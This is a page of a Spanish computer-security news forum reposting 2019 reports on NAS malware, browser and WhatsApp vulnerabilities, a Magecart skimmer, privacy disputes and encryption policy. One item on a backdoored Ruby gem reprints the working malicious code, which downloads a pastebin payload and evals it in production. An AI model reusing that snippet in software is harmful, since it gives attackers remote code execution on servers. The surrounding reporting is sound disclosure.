10

Miles de dispositivos NAS (Network Attached Storage o Almacenamiento conectado a la red, en español) del proveedor taiwanés QNAP se han visto afectados por una nueva variedad de malware llamada QSnatch. Únicamente en Alemania se han reportado más de 7.000 infecciones y el malware continúa extendiéndose.

Esta es la cuarta cepa de malware detectada este año que se ha dirigido a dispositivos NAS, siguiendo los pasos del ransomware que afectó a los dispositivos Synology, y de eCh0raix y Muhstik que afectaron a dispositivos QNAP.

Tan solo en Alemania se han reportado más de 7.000 infecciones de QSnatch, según el CERT-Bund (Equipo Alemán de Respuesta a Emergencias Informáticas). Pero se estima que la cifra puede ser muy superior, con dispositivos infectados en todo el mundo.

La semana pasada, el Centro Nacional de Seguridad Cibernética de Finlandia (NCSC-FI) alertaba de esta nueva versión de malware. Aunque aún no se ha descubierto cómo se propaga e infecta los sistemas NAS QNAP, un análisis del código fuente de QSnatch ha revelado que dispone de las siguientes capacidades:

  • Modificar tareas y scripts programados (cronjob y scripts de inicio).
  • Evitar actualizaciones de firmware sobrescribiendo las URL de origen de la actualización.
  • Impedir que se ejecute la aplicación nativa QNAP MalwareRemover.
  • Extraer y robar nombres de usuario y contraseñas de todos los usuarios del dispositivo NAS.

Además, una vez obtenido acceso a un dispositivo, QSnatch inyecta código malicioso en el firmware para obtener persistencia ante el reinicio del mismo.

QSnatch es capaz de realizar varias actividades maliciosas en un dispositivo infectado: ataques DDoS, minar criptomonedas, actuar como puerta trasera para robar archivos sensibles, o alojar cargas de malware para futuros ciberataques. Además, debido a que QSnatch tiene la capacidad de conectarse a un servidor C2 remoto para descargar nuevos módulos y ejecutarlos posteriormente, se especula que actualmente podría encontrarse en la fase de creación de una botnet para desplegar ataques en un futuro.

Por el momento, el único método confirmado para eliminar QSnatch consiste en realizar un restablecimiento completo de fábrica del dispositivo NAS infectado. Aunque según algunas fuentes, la instalación de una actualización de firmware que QNAP liberó en febrero de 2019 también solucionaría el problema.

Por el momento, se recomienda a los propietarios de NAS QNAP que dichos dispositivos no estén expuestos a Internet sin firewalls para evitar ataques externos.

Otros consejos compartidos por los analistas de NCSC-FI para tratar las consecuencias de una infección QSnatch incluyen:

  • Cambiar todas las contraseñas para todas las cuentas en el dispositivo.
  • Eliminar cuentas de usuario desconocidas del dispositivo.
  • Asegurarse de que el firmware del dispositivo esté actualizado y que todas las aplicaciones también estén actualizadas.
  • Eliminar aplicaciones desconocidas o no utilizadas del dispositivo.
  • Instalar la aplicación QNAP MalwareRemover a través de la funcionalidad de App Center.
  • Establecer una lista de control de acceso para el dispositivo (Control panel -> Security -> Security level).

FUENTE

11

Atención lectores, si está utilizando Chrome en sus computadoras con Windows, Mac y Linux, debe actualizar su software de navegación web de inmediato a la última versión que Google lanzó hoy.

Con el lanzamiento de Chrome 78.0.3904.87, Google advierte a miles de millones de usuarios que instalen una actualización urgente de software de inmediato para parchear dos vulnerabilidades de alta gravedad, una de las cuales los atacantes están explotando activamente para secuestrar computadoras.

Sin revelar detalles técnicos de la vulnerabilidad, el equipo de seguridad de Chrome solo dice que ambos problemas son vulnerabilidades use-after-free, uno afecta el componente de audio de Chrome (CVE-2019-13720) mientras que el otro reside en la libreria PDFium (CVE-2019-13721).

La vulnerabilidad use-after-free es una clase de problemas de corrupción de memoria que permite la corrupción o modificación de datos en la memoria, lo que permite a un usuario sin privilegios escalar privilegios en un sistema o software afectado.

Por lo tanto, ambas fallas podrían permitir a los atacantes remotos obtener privilegios en el navegador web Chrome simplemente al convencer a los usuarios objetivo de que visiten un sitio web malicioso, lo que les permite escapar de las protecciones de sandbox y ejecutar código malicioso arbitrario en los sistemas objetivo.

Google Chrome Zero-Day bajo ataques activos

Descubierto e informado por los investigadores de Kaspersky Anton Ivanov y Alexey Kulaev, el problema del componente de audio en la aplicación Chrome se ha descubierto explotado activamente, aunque en ese momento no está claro qué grupo específico de piratas informáticos.

"Google está al tanto de los informes de que existe un exploit para CVE-2019-13720 en la naturaleza", dijo el equipo de seguridad de Google Chrome en una publicación de blog.

"El acceso a los detalles y enlaces de errores puede mantenerse restringido hasta que la mayoría de los usuarios se actualicen con una solución. También conservaremos las restricciones si el error existe en una biblioteca de terceros de la que dependen otros proyectos de manera similar, pero que aún no se han solucionado."

El problema de use-after-free es una de las vulnerabilidades más comunes descubiertas y parcheadas en el navegador web Chrome en los últimos meses.

Hace poco más de un mes, Google lanzó una actualización de seguridad urgente para Chrome para parchear un total de cuatro vulnerabilidades use-after-free en diferentes componentes del navegador web, la más grave de las cuales podría permitir a los hackers remotos tomar el control de un sistema afectado.

En marzo de este año, Google también lanzó una actualización de seguridad de emergencia para Chrome después de que se descubriera que delincuentes explotaban activamente una vulnerabilidad de día cero de Chrome use-after-free similar en la naturaleza que afecta el componente FileReader del navegador.

Parche disponible: actualice Google Chrome inmediatamente

Para parchear ambas vulnerabilidades de seguridad, Google ya comenzó a implementar la versión 78.0.3904.87 de Chrome para los sistemas operativos Windows, Mac y Linux.

Aunque el navegador web Chrome notifica automáticamente a los usuarios sobre la última versión disponible, se recomienda a los usuarios que activen manualmente el proceso de actualización yendo a "Ayuda → Acerca de Google Chrome" en el menú.

Además de esto, a los usuarios de Chrome también se les recomienda ejecutar todo el software en sus sistemas, siempre que sea posible, como un usuario no privilegiado en un intento por disminuir los efectos de los ataques exitosos que explotan cualquier vulnerabilidad de día cero.

FUENTE

12

Las vulnerabilidades aprovechan la caché DNS del router para modificar la resolución a los dominios de actualización

RouterOS es un sistema operativo basado en Linux desarrollado para los routers MikroTik, aunque su instalación puede efectuarse en cualquier otro equipo como un PC. Este sistema cuenta con una serie de utilidades de código cerrado como es su propio comando ‘resolve’, el cual utiliza el protocolo de routerOS Winbox para la conexión con el router.

Es en esta utilidad que Jacob Baines de Tenable ha encontrado una vulnerabilidad por la cual no se valida la autenticación para ejecutar ‘resolve’, por lo que cualquier usuario sin autenticar puede utilizarlo, tal y como demuestra en una Prueba de Concepto (PoC). Esto en un principio no supone un gran problema, aunque sí lo es que las resoluciones DNS del comando se guarden en la caché DNS del router, ya que es posible elegir el servidor DNS que se usará para la resolución.

Aprovechando que se puede elegir el DNS que se usará para resolver la petición, y que ésta se cacheará en la tabla DNS del router, un atacante podría tomar el control del servidor DNS si estuviese en uso por los clientes. Pero esto no se queda aquí, ya que dicha caché se utiliza (sin necesidad de estar activado el modo servidor DNS) para la resolución de los servidores de actualización del router.

Aunque toda la comunicación con los servidores de RouterOS para actualizarse se realiza mediante HTTP sin cifrar, los paquetes que descarga sí están firmados, por lo que no es posible actualizar a una versión modificada sin que valide la firma. No obstante, un bug permite hacer downgrade a una versión vulnerable, teniendo la 6.45.6 la particularidad de que resetea las contraseñas al hacer downgrade, sólo teniendo que esperar el atacante a que el router se desactualice para acceder con las credenciales por defecto.

De momento no hay un parche que solucione las vulnerabilidades, aunque no es suficiente con parchear la autenticación en ‘resolve’: es necesario que las peticiones que realice no se cacheen. La única solución de momento es desactivar el protocolo Winbox de routerOS para evitar ser víctimas de este ataque, al menos hasta que se publique un parche.

Actualización:
La versión 6.45.7 de RouterOS soluciona las vulnerabilidades aquí descritas, identificadas como CVE-2019-3976, CVE-2019-3977, CVE-2019-3978 y CVE-2019-3979.

Mas información:
RouterOS: Chain to Root

FUENTE

13

Fue anunciada la nueva versión de la distribución de Linux Tails 4.0, siendo esta una de las primeras versiones de Tails en tomar como base a Debian 10 Buster, junto con lo cual también el Kernel del sistema fue actualizado a la versión 5.3.2, lo cual aporta una gran cantidad de soporte a componentes nuevos a la distribución, entre otros cambios más.

Para aquellos que aún desconocen de Tails, deben saber que esta distribución de Linux esta basada en los paquetes de Debian y destinada a proporcionar acceso anónimo a la red. El acceso anónimo a Tails es proporcionado por Tor. Todas las conexiones, excepto el tráfico a través de la red Tor, están bloqueadas por defecto con un filtro de paquetes.

El equipo detrás de Tails explica que esta versión añade más cambios al sistema que ninguna otra versión anterior, esto incluye tanto nuevas versiones del software que se viene por defecto, como mejoras importantes en la usabilidad y el rendimiento.

Veamos las principales novedades en Tails 4.0

Además de las mencionadas en el inicio, en Tails 4.0 podremos encontrar una gran cantidad de actualizaciones que fueron incorporadas de los diferentes componentes del sistema.

De los cuales uno de los principales es Tor, fue incluida su versión 9.0 que esta basada en Firefox 68 ESR y contiene una serie de actualizaciones a otros componentes también incluyendo Tor a 0.4.1.6 y OpenSSL a 1.1.1d.

También se destacan diversas mejoras de rendimiento en el sistema, tal es el caso que los desarrolladores comentan que Tails 4.0 fue optimizado para tener un inicio de hasta un 20% más rápido. Además de que están trabajando para optimizar el uso de memoria del sistema, ya que mencionan en el anuncio de Tails 4.0 requiere aproximadamente 250 MB menos de RAM.

Y que también la imagen del sistema fue reducida 47 MB más pequeña que Tails 3.16.

En cuanto a la paquetería del sistema en Tails 4.0, se podrán encontrar las versiones actualizadas de Audacity de 2.1.2 a 2.2.2, GIMP de 2.8.18 a 2.10.8, Inkscape de 0.92.1 a 0.92.4, LibreOffice de 5.2.7 a 6.1.5, git de 2.11.0 a 2.20.1, OnionShare de 0.9.2 a 1.3.2, Enigmail a 2.0.12 y gnupg a 2.2.12. Por otra parte también se destaca Electrum de 3.2.3 a 3.3.8, con lo cual Electrum vuelve a funcionar en Tails.

Por su parte el asistente de configuración inicial de Tails “Tails Greeter” recibió diversas mejoras, entre las cuales se destacan la selección de idioma, la lista de diseños de teclado, las páginas de ayuda y otros detalles más.

Para conocer mas visita este enlace.

14


Los piratas informáticos comprometieron la infraestructura de la plataforma de comercio electrónico basada en la nube Volusion para inyectar a las páginas de pago de los clientes un código JavaScript malicioso que roba datos de tarjetas.

Los atacantes agregaron código para la inyección dinámica del script de robo de datos de la tarjeta a un JavaScript que es parte del software de comercio electrónico Volusion.

Es probable que miles de sitios web carguen el script de los atacantes y envíen información de pago al servidor de los atacantes.

El sigilo es el juego

El investigador de seguridad de Check Point, Marcel Afrahim, descubrió mientras compraba en Sesame Street Live Store, un sitio web de Feld Entertainment que vende productos oficiales de Sesame Street, que el sitio estaba comprometido.

La tienda está construida con Volusion, que incluso proporciona los nameservers. En la página de pago, Afrahim notó la carga de código JavaScript desde Google Cloud Storage (storage.googleapis.com), un servicio web de almacenamiento de archivos para almacenar y acceder a datos en la infraestructura de Google Cloud Platform.

Lo extraño era que este era el único recurso cargado de una fuente que no era 'sesamestreetlivestore.com' o 'volusion.com' sitios web afiliados.

El JavaScript malicioso se llama 'resources.js' y proviene de un bucket llamado 'volusionapi'.



Parece que el atacante fue cuidadoso al nombrar los archivos para que parecieran lo más inocuos posible. Esto se ve respaldado por la descripción del código, que se copió del repositorio de GitHub de Javascript Cookie v2.1.4, una API legítima para manejar cookies.


MageCart script on rocknthreads.com

Sin embargo, el análisis del código revela que el script lee los valores escritos en los campos para información de la tarjeta de crédito, lo codifica en Base64 y lo almacena en el 'sessionStorage' temporal del navegador con el nombre '__utmz_opt_in_out'

A continuación, se filtra a 'volusion-cdn.com/analytics/beacon', el dominio del atacante que se creó para parecer que era parte de la infraestructura de Volusion.

Los nombres de la carpeta están diseñados para hacer que el tráfico parezca un análisis inofensivo o datos de seguimiento web. Aún más, al hacer una solicitud GET al dominio se redirige a un Volusion CDN (red de entrega de contenido) legítimo, señala el investigador.

Sin embargo, una búsqueda whois del dominio muestra que se registró el 7 de septiembre, lo que sugiere que el compromiso se produjo a principios del mes pasado y que los clientes de Volusion pueden haberse infectado en ese momento.



Robar datos de tarjetas de pago de esta manera se conoce como un compromiso de MageCart. RiskIQ notó el primer ataque de este tipo en 2010, pero los incidentes aumentaron recientemente y crecieron en proporciones enormes, con cientos de miles de sitios web infectados con JavaScript que roba datos de tarjetas de pago de las páginas de pago.

Miles de tiendas pueden verse afectadas

La carga del script malicioso en las páginas de los clientes de Volusion se realiza a través del JavaScript 'vnav.js', que se utiliza para navegar por el menú de la interfaz de usuario.

Según su descripción, el archivo es jQuery UI - v1.10.3 y no es específico de una tienda. Miles pueden estar infectados.



El script malicioso cargado por vnav.js estaba ubicado en 'storage.googleapis.com/volusionapi/resources.js' y contenía el script Magecart que robaría la información de pago ingresada en el formulario.



En la página de la compañía, Volusion cuenta con 30,000 comerciantes que utilizan activamente la plataforma. Son de una variedad de campos y la página dedicada muestra a los comerciantes que venden productos en las categorías de indumentaria, hogar y jardín, salud y belleza, automóviles e industria y electrónica. De nuestros cheques, no todos ellos todavía están en el negocio.

Una búsqueda rápida de los dominios que contienen el JavaScript de Volusion contaminado arrojó casi 6.600 resultados. Sin embargo, es posible que no todos estén comprometidos.

Tras los informes de los medios de comunicación y los investigadores de seguridad, Volusion abordó el problema hace unas horas. Antes de eso, Google tomó medidas y mostró la advertencia roja de "peligro de malware" cuando visitaba sitios web que cargaban JavaScript malicioso.

FUENTE

15


Una imagen vale más que mil palabras, pero un GIF vale más que mil imágenes.

Hoy en día, los cortos clips de bucle, GIF, están en todas partes: en sus redes sociales, en sus chats, ayudando a los usuarios a expresar perfectamente sus emociones, haciendo reír a las personas y reviviendo lo más destacado.

Pero, ¿qué sucede si un saludo GIF de aspecto inocente con un mensaje de Buenos días, Feliz cumpleaños o Feliz Navidad piratea su teléfono inteligente?

Bueno, ya no es una idea teórica.

WhatsApp ha parcheado recientemente una vulnerabilidad de seguridad crítica en su aplicación para Android, que permaneció sin parchear durante al menos 3 meses después de ser descubierta, y si se explotaba, podría haber permitido que los piratas informáticos remotos comprometan los dispositivos Android y potencialmente roben archivos y mensajes de chat.

Vulnerabilidad de ejecución remota de código de WhatsApp

La vulnerabilidad, registrada como CVE-2019-11932, es un error de corrupción de memoria doblemente libre que en realidad no reside en el código de WhatsApp, sino en una biblioteca de análisis de imágenes GIF de código abierto que utiliza WhatsApp.



Descubierto por el investigador de seguridad vietnamita Pham Hong Nhat en mayo de este año, el problema conduce con éxito a ataques de ejecución remota de código, lo que permite a los atacantes ejecutar código arbitrario en dispositivos específicos en el contexto de WhatsApp con los permisos que la aplicación tiene en el dispositivo.

"La carga útil se ejecuta en el contexto de WhatsApp. Por lo tanto, tiene el permiso para leer la tarjeta SD y acceder a la base de datos de mensajes de WhatsApp", dijo el investigador a The Hacker News en una entrevista por correo electrónico.

"El código malicioso tendrá todos los permisos que tiene WhatsApp, incluida la grabación de audio, el acceso a la cámara, el acceso al sistema de archivos, así como el almacenamiento sandbox de WhatsApp que incluye una base de datos de chat protegida, etc."

¿Cómo funciona la vulnerabilidad de WhatsApp RCE?

WhatsApp utiliza la biblioteca de análisis en cuestión para generar una vista previa de los archivos GIF cuando los usuarios abren la galería de su dispositivo antes de enviar cualquier archivo multimedia a sus amigos o familiares.

Por lo tanto, debe tenerse en cuenta que la vulnerabilidad no se activa al enviar un archivo GIF malicioso a una víctima; en su lugar, se ejecuta cuando la propia víctima simplemente abre el Selector de Galería de WhatsApp mientras intenta enviar cualquier archivo multimedia a alguien.



Para explotar este problema, todo lo que un atacante debe hacer es enviar un archivo GIF malicioso especialmente diseñado a un usuario Android objetivo a través de cualquier canal de comunicación en línea y esperar a que el usuario simplemente abra la galería de imágenes en WhatsApp.

Sin embargo, si los atacantes desean enviar el archivo GIF a las víctimas a través de cualquier plataforma de mensajería como WhatsApp o Messenger, deben enviarlo como un archivo de documento en lugar de archivos adjuntos de medios, porque la compresión de imágenes utilizada por estos servicios distorsiona la carga maliciosa oculta en las imágenes .

Como se muestra en una demostración de video de prueba de concepto que el investigador compartió, la vulnerabilidad también se puede explotar para simplemente abrir un shell inverso de forma remota desde el dispositivo pirateado.

Aplicaciones, dispositivos y parches disponibles vulnerables

El problema afecta a las versiones 2.19.230 de WhatsApp y versiones anteriores que se ejecutan en Android 8.1 y 9.0, pero no funciona para Android 8.0 y versiones mas antiguas.

"En las versiones anteriores de Android, el double-free todavía podía activarse. Sin embargo, debido a las llamadas malloc del sistema después del double-free, la aplicación simplemente falla antes de llegar al punto en el que podríamos controlar el registro de la PC". El investigador escribe.

Nhat informó la vulnerabilidad a Facebook, propietario de WhatsApp, a fines de julio de este año, y que la compañía incluyó un parche de seguridad en WhatsApp versión 2.19.244, lanzado en septiembre.

Por lo tanto, para protegerse contra cualquier vulnerabilidad que rodee esta vulnerabilidad, se recomienda actualizar su WhatsApp a la última versión de Google Play Store lo antes posible.

Además de esto, dado que la falla reside en una biblioteca de código abierto, también es posible que cualquier otra aplicación de Android que use la misma biblioteca afectada también pueda ser vulnerable a ataques similares.

El desarrollador de la biblioteca GIF afectada, llamada Android GIF Drawable, también ha lanzado la versión 1.2.18 del software para parchear la vulnerabilidad doblemente libre.

WhatsApp para iOS no se ve afectado por esta vulnerabilidad.

FUENTE

16

En esta ocasión, han sido el especialista Jesse Michael de Eclypsium junto con personal de Intel, quienes han identificado una nueva vulnerabilidad que afecta directamente a la herramienta de diagnóstico del procesador Intel, además de un fallo adicional que afectaría a la seguridad de los Data Center SSD.

La vulnerabilidad relacionada con la herramienta de diagnóstico del procesador, se ha catalogado como CVE-2019-11133 con una puntuación CVSS de 8.2 sobre 10. Dicha vulnerabilidad podría permitir a un usuario autentificado realizar una escalada de privilegios con la que podría acceder a información confidencial o realizar ataques de denegación de servicios (DoS) mediante un acceso local.

Por otro lado, la vulnerabilidad que afectaría a los data center SSD, concretamente a las unidades de las series S4500 y S4600 de Intel, permitiría a un usuario no autentificado escalar privilegios a través de un punto de acceso físico; aunque ha sido puntuada con 5.3 sobre 10 en la escala CVSS, por lo que no se considera crítica.

Intel recibió el reporte y ha podido lanzar los correspondientes parches de seguridad antes del plazo de 90 días para la divulgación pública de vulnerabilidades. Y aunque la compañía ha resuelto alrededor de 25 vulnerabilidades críticas en lo que va de año, el volumen de vulnerabilidades que se está detectando últimamente parece indicar que la estrategia de seguridad de la compañía debería actualizarse.

Fuente https://unaaldia.hispasec.com/2019/07/el-data-centre-ssd-de-intel-podria-permitir-hacerse-con-el-control-completo-de-los-servidores.html

17

Microsoft Office 365 ha sido declarado ilegal en el estado alemán por cuestiones relacionadas con la privacidad. La información de estudiantes y maestros que usan la configuración estándar de Microsoft Office 365 podría estar «expuesta» a las agencias de espionaje de Estados Unidos, según ha dictaminado el Comisionado de protección de datos de ese estado alemán.

El caso que afecta a la suite de productividad en nube de Microsoft (la más popular del mercado en su tipo) es un ejemplo más de las preocupaciones europeas sobre la privacidad de datos y también de la política exterior de la actual administración de Estados Unidos. La decisión de la Oficina de este estado alemán es el resultado de varios años de debate interno sobre si las escuelas alemanas y otras instituciones estatales deberían utilizar el software de Microsoft.

La idea de aumentar la «soberanía digital» está aumentando en Alemania y en toda Europa. Y no solo afecta a Microsoft sino a cualquier tecnológica estadounidense que trabaje en el Viejo Continente. «Tenemos que considerar servicios en nube nacionales y respaldarlos con una financiación realista. La situación política nos está obligando a ello», explicó recientemente un alto funcionario del Ministerio del Interior alemán.

La polémica sobre la privacidad de Office 365 no es nueva. A finales de 2018, investigadores del regulador oficial holandés publicaron un informe donde identificaron una «recopilación de datos personales a gran escala y encubierta» en las suites ofimáticas de Microsoft, Office 2016 y Office 365 de ProPlus.

Microsoft recopila datos con fines «funcionales y de seguridad» en todas sus soluciones de software. Sin embargo, el informe aseguran que ocho apartados descubiertos en la telemetría de Microsoft Office (también de Window 10 Enterprise) incumplirían el nuevo reglamento de protección de datos de la UE, GDPR, y la propia privacidad de los usuarios.

Fuente:
https://www.muyseguridad.net/2019/07/15/microsoft-office-365/

18
Noticias Informáticas / Backdoor descubierto en una librería de Ruby
« en: Julio 15, 2019, 09:11:00 am »

El desarrollador Tute Costa ha descubierto un backdoor alojado en una popular librería (Gem) de Ruby llamada strong_password, utilizada para comprobar la robustez de las contraseñas elegidas por los usuarios.

El código malicioso comprueba si la biblioteca se está utilizando en un entorno de producción, en caso afirmativo descarga y ejecuta un payload desde la plataforma pastebin.com, un conocido repositorio de texto online. Al ejecutarse el payload se crea la puerta trasera en la app o página web dando acceso a la ejecución de código remoto al atacante.

Código: [Seleccionar]
def _!;
  begin;
    yield;
  rescue Exception;
  end;
end

_!{
  Thread.new {
    loop {
      _!{
        sleep rand * 3333;
        eval(
          Net::HTTP.get(
            URI('[url]https://pastebin.com/raw/xa456PFt[/url]')
          )
        )
      }
    }
  } if Rails.env[0] == "p"

El backdoor envía la URL de cada sitio infectado a «smiley.zzz.com.ua», quedándose a la espera de nuevas instrucciones, que serán recibidas en forma de cookies, desempaquetadas y ejecutadas a través de la función eval. Esto da acceso al atacante a ejecutar código, con el que sencillamente puede conseguir una terminal en el servidor infectado.

En el momento de reportar el problema al propietario de la biblioteca, descubrió que el atacante presuntamente reemplazó al desarrollador real de la librería en RubyGems, repositorio oficial del lenguaje Ruby. Creó una nueva versión (0.0.7) de la ya existente librería con el backdoor en su interior. Según las estadísticas de RubyGems la librería 537 usuarios descargaron esta versión maliciosa. Además el código fuente de esta nueva versión no fue subido a Github, tan solo fue distribuido a través de RubyGems.

Costas reportó tanto al propietario como al equipo de seguridad de RubyGems y la versión maliciosa fue eliminada del repositorio.

Cualquier proyecto que utilice la citada librería strong_password debería ser revisado exhaustivamente para detectar posibles robos de datos de usuarios u otro tipo de acciones llevadas a cabo por el atacante.

Fuente:
https://unaaldia.hispasec.com/2019/07/backdoor-descubierto-en-una-libreria-de-ruby.html

19
Noticias Informáticas / El lado oculto de Google reCAPTCHA v3
« en: Julio 02, 2019, 09:17:34 am »

Por primera vez en la historia de los CAPTCHAS desaparece la necesidad de que el usuario tenga que introducir un texto ilegible en un campo de verificación, que tenga que marcar esa casilla de «no soy un robot» o peor aún, que tenga que indicar qué imágenes de un mosaico corresponden con la de un gato.

Según explicaban los ingenieros de Google, la nueva versión de reCAPTHA no exige nada al usuario. Se ejecutará en segundo plano, e irá identificando y clasificando automáticamente a los usuarios entre robots o humanos, utilizando un sistema de puntuación basado sobre las pautas de su actividad, elaborando distintos perfiles de riesgo.

Todo esto suena por supuesto estupendamente bien. La navegación se convierte en una experiencia mucho más fluida y transparente y las web que integran el nuevo reCAPTCHA «molestan» menos a sus usuarios. Así que todos ganan: ¿O no?

Pues no está tan claro. Como ya ha denunciado un grupo de expertos en ciberseguridad, lo nuevo de Google tiene una cara mucho menos amable: la intromisión en la privacidad de los usuarios. Para comprender por qué esto es así, lo primero hay explicar cómo funciona este nuevo sistema.

La supercookie de Google

Google como la mayoría de los sitios que visitamos en Internet por primera vez, suele preguntarnos si estamos dispuestos a aceptar sus cookies. Para ellos y para nosotros, es importante. La cookie de Google nos permite entre otras cosas que sus servicios «recuerden» que ya nos hemos autenticado con anterioridad en uno de sus servicios, de modo que no tengamos que introducir nuestro nombre y nuestra contraseña cada vez que los visitamos.

Y hasta aquí bien. Pero por supuesto la cookie de Google hace más cosas, casi todas «inofensivas» hasta ahora. Y decimos hasta ahora, porque lo que denuncian estos investigadores es que para que reCAPTCHA funcione sin necesidad de «interactuar» con el usuario, lo que hace es tomar buena nota de todos sus hábitos de navegación.

De esta forma, si comprueba que navega tal y como lo haría un ser humano, le otorgará un scoring alto y por lo tanto lo considerará digno de confianza. En cambio, si sospecha que no navega tal y como lo haría una persona, el scoring será mucho menor y en este caso el servicio pondrá en marcha otras medidas de autenticación, como puede ser un doble factor.

Esto quiere decir que seamos o no usuarios de los productos de Google, las webs que implementen el nuevo sistema van a «forzar» a sus usuarios a aceptar su cookie tanto si lo quieren como si no. Y esto no son precisamente buenas noticias para los amigos de la privacidad.

Tal y como han comprobado estos investigadores, al utilizar un servicio VPN o la red TOR para acceder a los sitios que han incluido esta medida de seguridad, el sistema responde automáticamente indicando que el visitante es de alto riesgo y o bien impide completamente el acceso o bien pone en marcha otras medidas de autenticación.

En estos momentos, de las 4,5 millones de páginas web que están utilizando el sistema reCaptcha, aproximadamente 450.000 han implementado la última versión de este sistema.

FUENTE

20

La administración de Trump está considerando la prohibición del cifrado de extremo a extremo, una característica adoptada ampliamente en servicios tecnológicos para aumentar la seguridad y privacidad.

Politico menciona una reunión de alto nivel en la Casa Blanca con representantes de varias agencias federales en la búsqueda de una posición común que lleve a la propuesta de un cambio legislativo que podría obligar a las compañías estadounidenses o a las que trabajen en el país a eliminar esta medida de seguridad.

Ya sabes de qué va esto. Bajo el argumento de “aumentar la seguridad” contra el terrorismo y la delincuencia, la administración de Trump no ha encontrado otra fórmula que devolvernos a la edad de piedra tecnológica. La eliminación del cifrado estaría destinada a facilitar el acceso y seguimiento de los dispositivos electrónicos por las fuerzas de seguridad y agencias de espionaje, pero conllevaría dejar los equipos tan abiertos como un queso gruyere.

El cifrado es una herramienta de seguridad en la que nos apoyamos todos los días para evitar que los delincuentes roben nuestras cuentas bancarias, para proteger el control de nuestros coches y aviones de hackeos maliciosos y en general «para preservar nuestra seguridad y bienestar», como afirmó en una declaración el Information Technology Industry Council (ITI), voz global del sector tecnológico que incluye compañías como Apple, Dell, Facebook, Google, Microsoft, IBM, Intel o Twitter. Resumido:

Debilitar la seguridad con el objetivo de promover la seguridad, simplemente no tiene sentido

Las mismas compañías tecnológicas posicionan el cifrado de extremo a extremo como una característica clave de privacidad, y varias de ellas han advertido que cualquier regulación en su contra podría incluso afectar seriamente a la pretendida seguridad nacional, porque dejaría los dispositivos abiertos a ataques como un queso gruyer.

Incluso, hay división entre las mismas agencias federales y la Agencia de Seguridad de Infraestructura y Ciberseguridad está en desacuerdo al conocer la importancia de cifrar datos confidenciales, especialmente en las operaciones de infraestructura crítica.

El ataque mundial con WannaCry, cuya responsabilidad primaria fue de los exploits preparados por la agencia NSA para espionaje masivo, mostró las derivadas que tiene todo este asunto. Por no hablar de la pérdida evidente del derecho a la privacidad si se aprueba una normativa que obligaría a las empresas de alta tecnología, ISPs y proveedores de servicios a entregar todo el contenido de los usuarios en tiempo casi real.

Las fuerzas de seguridad deben contar con herramientas para prevenir los ataques terroristas y la gran delincuencia, y ya tienen medios para hacerlo tutelados por el imprescindible control judicial. La eliminación del cifrado de extremo a extremo no es la solución sino el medio para «impulsar la agenda del Gran Hermano», como critican organizaciones pro-privacidad. Un auténtico disparate que esperemos no se concrete. Con Donald Trump de por medio, espera cualquier cosa.

FUENTE

Páginas: [1] 2 3 ... 5